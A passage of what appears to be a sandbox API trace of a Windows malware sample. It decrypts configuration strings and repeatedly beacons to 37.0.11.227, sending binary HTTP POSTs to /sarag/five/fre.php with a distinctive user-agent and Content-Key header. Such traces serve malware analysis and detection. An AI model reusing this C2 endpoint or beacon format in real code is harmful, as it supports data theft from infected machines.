phProv=0x19fca8*=0x6aed48) returned 1 [0196.203] GetProcessHeap () returned 0x690000 [0196.203] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0196.204] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.204] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0196.205] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.206] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0196.206] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.210] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0196.210] GetProcessHeap () returned 0x690000 [0196.210] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0196.211] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.212] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0196.212] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.213] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0196.213] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.214] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0196.214] GetProcessHeap () returned 0x690000 [0196.214] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0196.215] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0196.215] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0196.271] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0196.271] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0196.272] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0196.272] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0196.273] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0196.273] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0196.273] GetProcessHeap () returned 0x690000 [0196.273] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0196.273] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0196.274] GetProcessHeap () returned 0x690000 [0196.274] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0196.274] GetProcessHeap () returned 0x690000 [0196.275] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0196.277] GetProcessHeap () returned 0x690000 [0196.277] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0196.277] GetProcessHeap () returned 0x690000 [0196.277] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0196.279] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.279] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0196.291] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.291] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0196.301] GetProcessHeap () returned 0x690000 [0196.301] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0196.302] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.302] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0196.303] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.303] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0196.304] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.304] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0196.304] GetProcessHeap () returned 0x690000 [0196.305] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0196.305] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.306] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0196.306] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.307] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0196.307] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.308] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0196.308] GetProcessHeap () returned 0x690000 [0196.308] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0196.309] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0196.309] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0196.309] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0196.310] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0196.310] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0196.311] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0196.311] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0196.311] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0196.311] GetProcessHeap () returned 0x690000 [0196.312] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0196.312] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a9dc0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeac0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0196.312] GetProcessHeap () returned 0x690000 [0196.312] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4e0 [0196.312] socket (af=2, type=1, protocol=6) returned 0x3e8 [0196.312] connect (s=0x3e8, name=0x6aeac0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0196.338] FreeAddrInfoW (pAddrInfo=0x6a9dc0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeac0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0196.338] GetProcessHeap () returned 0x690000 [0196.338] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0196.338] GetProcessHeap () returned 0x690000 [0196.338] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b2fb8 [0196.339] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0196.340] wvsprintfA (in: param_1=0x6b2fb8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0196.340] GetProcessHeap () returned 0x690000 [0196.340] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afec0 [0196.340] GetProcessHeap () returned 0x690000 [0196.340] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0196.340] GetProcessHeap () returned 0x690000 [0196.341] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0196.341] GetProcessHeap () returned 0x690000 [0196.341] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b2fb8 [0196.341] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0196.342] wvsprintfA (in: param_1=0x6b2fb8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0196.342] GetProcessHeap () returned 0x690000 [0196.342] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0196.342] GetProcessHeap () returned 0x690000 [0196.343] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0196.343] send (s=0x3e8, buf=0x6abd08*, len=242, flags=0) returned 242 [0196.344] send (s=0x3e8, buf=0x6aba40*, len=159, flags=0) returned 159 [0196.344] GetProcessHeap () returned 0x690000 [0196.344] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0196.344] recv (in: s=0x3e8, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0196.414] GetProcessHeap () returned 0x690000 [0196.415] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0196.415] GetProcessHeap () returned 0x690000 [0196.416] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0196.417] GetProcessHeap () returned 0x690000 [0196.417] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afec0 | out: hHeap=0x690000) returned 1 [0196.417] GetProcessHeap () returned 0x690000 [0196.417] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0196.417] closesocket (s=0x3e8) returned 0 [0196.418] GetProcessHeap () returned 0x690000 [0196.418] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4e0 | out: hHeap=0x690000) returned 1 [0196.418] GetProcessHeap () returned 0x690000 [0196.418] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0196.418] GetProcessHeap () returned 0x690000 [0196.419] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0196.419] GetProcessHeap () returned 0x690000 [0196.419] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0196.419] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x11bc) returned 0x3e8 [0196.421] Sleep (dwMilliseconds=0xea60) [0196.423] GetProcessHeap () returned 0x690000 [0196.423] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0196.424] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.425] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0196.431] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.432] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0196.442] GetProcessHeap () returned 0x690000 [0196.442] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0196.448] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.449] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0196.450] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.450] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0196.451] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.451] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0196.451] GetProcessHeap () returned 0x690000 [0196.451] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0196.452] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.452] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0196.453] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.453] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0196.454] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.454] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0196.454] GetProcessHeap () returned 0x690000 [0196.454] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0196.455] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0196.455] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0196.456] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0196.456] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0196.457] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0196.457] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0196.458] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0196.458] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0196.458] GetProcessHeap () returned 0x690000 [0196.458] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0196.458] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0196.458] GetProcessHeap () returned 0x690000 [0196.459] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0196.459] GetProcessHeap () returned 0x690000 [0196.459] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0196.459] GetProcessHeap () returned 0x690000 [0196.460] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0196.460] GetProcessHeap () returned 0x690000 [0196.460] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0196.460] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.460] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0196.465] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.465] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0196.470] GetProcessHeap () returned 0x690000 [0196.470] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0196.471] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.471] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0196.472] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.472] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0196.473] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.473] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0196.473] GetProcessHeap () returned 0x690000 [0196.474] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0196.474] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.474] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0196.475] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.475] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0196.476] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.476] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0196.476] GetProcessHeap () returned 0x690000 [0196.476] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0196.478] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0196.478] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0196.479] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0196.479] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0196.480] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0196.480] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0196.481] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0196.481] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0196.481] GetProcessHeap () returned 0x690000 [0196.481] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0196.481] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a9f00*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae8c8*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0196.481] GetProcessHeap () returned 0x690000 [0196.481] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3e0 [0196.481] socket (af=2, type=1, protocol=6) returned 0x3ec [0196.481] connect (s=0x3ec, name=0x6ae8c8*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0196.511] FreeAddrInfoW (pAddrInfo=0x6a9f00*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae8c8*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0196.511] GetProcessHeap () returned 0x690000 [0196.511] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0196.511] GetProcessHeap () returned 0x690000 [0196.511] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b2fb8 [0196.512] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0196.513] wvsprintfA (in: param_1=0x6b2fb8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0196.513] GetProcessHeap () returned 0x690000 [0196.513] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afa40 [0196.513] GetProcessHeap () returned 0x690000 [0196.514] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0196.514] GetProcessHeap () returned 0x690000 [0196.514] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0196.514] GetProcessHeap () returned 0x690000 [0196.514] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b2fb8 [0196.515] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0196.515] wvsprintfA (in: param_1=0x6b2fb8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0196.515] GetProcessHeap () returned 0x690000 [0196.515] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0196.516] GetProcessHeap () returned 0x690000 [0196.516] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0196.516] send (s=0x3ec, buf=0x6abd08*, len=242, flags=0) returned 242 [0196.517] send (s=0x3ec, buf=0x6aba40*, len=159, flags=0) returned 159 [0196.517] GetProcessHeap () returned 0x690000 [0196.517] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0196.517] recv (in: s=0x3ec, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0196.595] GetProcessHeap () returned 0x690000 [0196.596] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0196.596] GetProcessHeap () returned 0x690000 [0196.596] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0196.596] GetProcessHeap () returned 0x690000 [0196.597] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afa40 | out: hHeap=0x690000) returned 1 [0196.597] GetProcessHeap () returned 0x690000 [0196.597] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0196.597] closesocket (s=0x3ec) returned 0 [0196.598] GetProcessHeap () returned 0x690000 [0196.598] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3e0 | out: hHeap=0x690000) returned 1 [0196.598] GetProcessHeap () returned 0x690000 [0196.598] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0196.599] GetProcessHeap () returned 0x690000 [0196.599] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0196.600] GetProcessHeap () returned 0x690000 [0196.600] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0196.600] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x11c0) returned 0x3ec [0196.604] Sleep (dwMilliseconds=0xea60) [0196.606] GetProcessHeap () returned 0x690000 [0196.606] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0196.607] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.607] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0196.613] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.614] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0196.619] GetProcessHeap () returned 0x690000 [0196.619] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0196.620] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.620] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0196.621] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.621] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0196.622] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.622] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0196.622] GetProcessHeap () returned 0x690000 [0196.623] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0196.624] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.624] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, 